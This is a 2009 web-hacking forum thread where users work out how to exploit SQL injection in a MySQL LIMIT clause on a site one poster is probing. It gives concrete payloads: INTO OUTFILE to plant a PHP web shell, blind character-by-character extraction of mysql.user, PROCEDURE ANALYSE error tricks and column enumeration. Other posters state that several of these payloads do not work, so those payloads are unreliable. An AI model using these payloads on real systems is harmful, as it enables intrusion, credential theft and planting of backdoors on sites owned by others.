Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
LIMIT= query be attacked?
Posted by: m4x
Date: January 10, 2009 05:54PM

I can generate a mysql error on a Limit=100 query at the end of a URL, but can it be attacked?

The error looks something like this:
Error: Failed: SELECT * FROM books_read_hiscores WHERE count>=230 ORDER BY count DESC LIMIT 0,100\'

Options: ReplyQuote
Re: LIMIT= query be attacked?
Posted by: barbarianbob
Date: January 10, 2009 06:39PM

If mysql is on the same server as php and you can control some of the returned text:
Add some php code into a row of books_read_hiscores (aka some VARCHAR column that asks your name), then run

LIMIT 0,100 INTO OUTFILE '../../../../../path/to/htdocs/randomFileName.php'

where the limit grabs the row with the php code.
Then open hxxp://site/randomFileName.php



Edited 2 time(s). Last edit at 01/10/2009 06:40PM by barbarianbob.

Options: ReplyQuote
Re: LIMIT= query be attacked?
Posted by: Reiners
Date: January 11, 2009 04:46AM

this wont work because magic quotes seems to be enabled and you definetly need quotes for INTO OUTFILE. maybe I come up with a better idea in the next days when I have my test enviroment available.

Options: ReplyQuote
Re: LIMIT= query be attacked?
Posted by: m4x
Date: January 11, 2009 02:59PM

Ok, tell me how you do ;).

Options: ReplyQuote
Re: LIMIT= query be attacked?
Posted by: backbone
Date: January 12, 2009 07:21PM

I think you would succeed if you were in a lucky position, lucky as in the database being in GBK -> http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string ... that, if for escaping addslashes was used.

...or maybe find a sql injection in other places you might have missed :)

---
blog [-] microblog

Options: ReplyQuote
Re: LIMIT= query be attacked?
Posted by: Pragmatk
Date: January 14, 2009 01:31PM

LIMIT 0,100 PROCEDURE ANALYSE(15,2000) might be able to give you more errors (we all love errors, right?).

So we have a few options. If it has more than 255 articles to display in the DB, you can do

LIMIT 0,ASCII(SUBSTRING((SELECT user from mysql.user LIMIT 1),0,1)
LIMIT 0,ASCII(SUBSTRING((SELECT user from mysql.user LIMIT 1),1,1)
... etc...
<-- To get the ascii value of the characters in the string :-)

You could also go for the semi-blind way :)

LIMIT 0,IF(ASCII(SUBSTRING((SELECT user from mysql.user LIMIT 1),0,1)) > 127,1,2)
<-- If it returns 0 results (or an error message) we got an error (like, no access to mysql.user, for instance). If it returns 1 result, the ascii value of the first character in the username is > 127, if it returns 2, it is < 127. Using this method you can get the value of each character in less than 10 queries (which may seem tiresome, but is way more effective than a real bruteforce attack). You can use a tool sqlmap to automate the process of dumping the info.

etc...

Options: ReplyQuote
Re: LIMIT= query be attacked?
Posted by: backbone
Date: January 14, 2009 03:27PM

@Pragmatk: would you like sharing an instance in which the ANALYSE() procedure would cause an useful error (except for 1108 error messages, which is not useful)? I'm highly skeptic about it...

---
LIMIT 0,ASCII(SUBSTRING((SELECT user from mysql.user LIMIT 1),0,1)
---

Up to the recent version of mysql, I know none which will accept this type of limit condition...

---
LIMIT 0,IF(ASCII(SUBSTRING((SELECT user from mysql.user LIMIT 1),0,1)) > 127,1,2)
---

o_O I would like to see you testing the above methods.
Before helping other people, try to double check the things you say because you'll only end up confusing them.

---
blog [-] microblog

Options: ReplyQuote
Re: LIMIT= query be attacked?
Posted by: m4x
Date: January 14, 2009 03:50PM

none of the methods above work :S.

Options: ReplyQuote
Re: LIMIT= query be attacked?
Posted by: barbarianbob
Date: January 14, 2009 03:53PM

The closest I've gotten is to use PROCEDURE ANALYSE(15,2000), as Pragmatk said, but you can't do much in there, either.

SELECT * FROM a LIMIT 0,1 PROCEDURE ANALYSE(15,2000);
Empty set (0.08 sec)

SELECT * FROM a LIMIT 0,1 PROCEDURE ANALYSE((SELECT 15),2000);
Empty set (0.01 sec)

SELECT * FROM a LIMIT 0,1 PROCEDURE ANALYSE((SELECT 14+1),2000);
ERROR 1108 (HY000): Incorrect parameters to procedure 'ANALYSE'

SELECT * FROM a LIMIT 0,1 PROCEDURE ANALYSE((SELECT IF(1,15,15)),2000);
ERROR 1108 (HY000): Incorrect parameters to procedure 'ANALYSE'

As soon as you do any math (14+1), you get an error. As soon as you try a function, you get an error.
All that's needed to get a blind injection is to run a function, but I've been unable to do so.
Once someone finds a way to execute a function after the LIMIT clause, we will be swimming in vulnerabilities. Since LIMIT doesn't let you put quotes around the number, mysql_real_escape_string() will become ineffective in blocking the injection. Then it will be free blind injections for everyone.

Options: ReplyQuote
Re: LIMIT= query be attacked?
Posted by: m4x
Date: January 14, 2009 04:14PM

hmm didnt work dmn, pmed u

Options: ReplyQuote
Re: LIMIT= query be attacked?
Posted by: Pragmatk
Date: January 21, 2009 03:16PM

Damned, I was mistaken; you guys are right. I'm sorry I sidetracked you there :(
LIMIT is a bitch :/

PROCEDURE ANALYSE is cool though. It doesn't allow subqueries, though, so I can't imagine many situations where you can use it to return data. In a lot of cases it can be extremely nice for retrieving data about the table and queries though. For one, it's good for detecting stacked queries. In some (rare) cases you can also get column types "for free" using it.
It's also neat for making sure you have hole through to a mysql database in those cases where you are in doubt (especially blind stuff).

Options: ReplyQuote
Progress :-)
Posted by: Pragmatk
Date: January 25, 2009 09:57AM

I played around with this some more. I don't know how useful it is if you only have this injection point, but you can enumerate the amount of columns.

The procedure is pretty much like union select null, [null ...]

limit 5 into @version
limit 5 into @version,@version
limit 5 into @version,@version,@version
etc...

Options: ReplyQuote
Re: LIMIT= query be attacked?
Posted by: Reiners
Date: January 26, 2009 11:28AM

hm nice (note that you can name the vars whatever you like, this has nothing to do with @@version), but unfortunetly you cant do much with the amount of columns. But I couldnt come up with something better yet :S
PROCEDURE ANALYSE is interesting though, I created a small post about it here:
http://websec.wordpress.com/2009/01/26/mysql-table-and-column-names-update/
I hope credits are fine, else PM me.
Additionally I managed to crash MySQL4 with this operation, but while having a look at the mysql bugsystem this operation caused alot of trouble in the past, so nothing fancy I guess.



Edited 1 time(s). Last edit at 01/26/2009 11:29AM by Reiners.

Options: ReplyQuote
Re: LIMIT= query be attacked?
Posted by: Pragmatk
Date: January 30, 2009 03:20PM

I wrote a bit more on extracting data using this.

http://pragmatk.geeksgonewild.info/sql-injection/mysql/2009-01-29/to-the-limit-and-beyond/

Have fun!



Edited 1 time(s). Last edit at 02/01/2009 12:44PM by Pragmatk.

Options: ReplyQuote


Sorry, only registered users may post in this forum.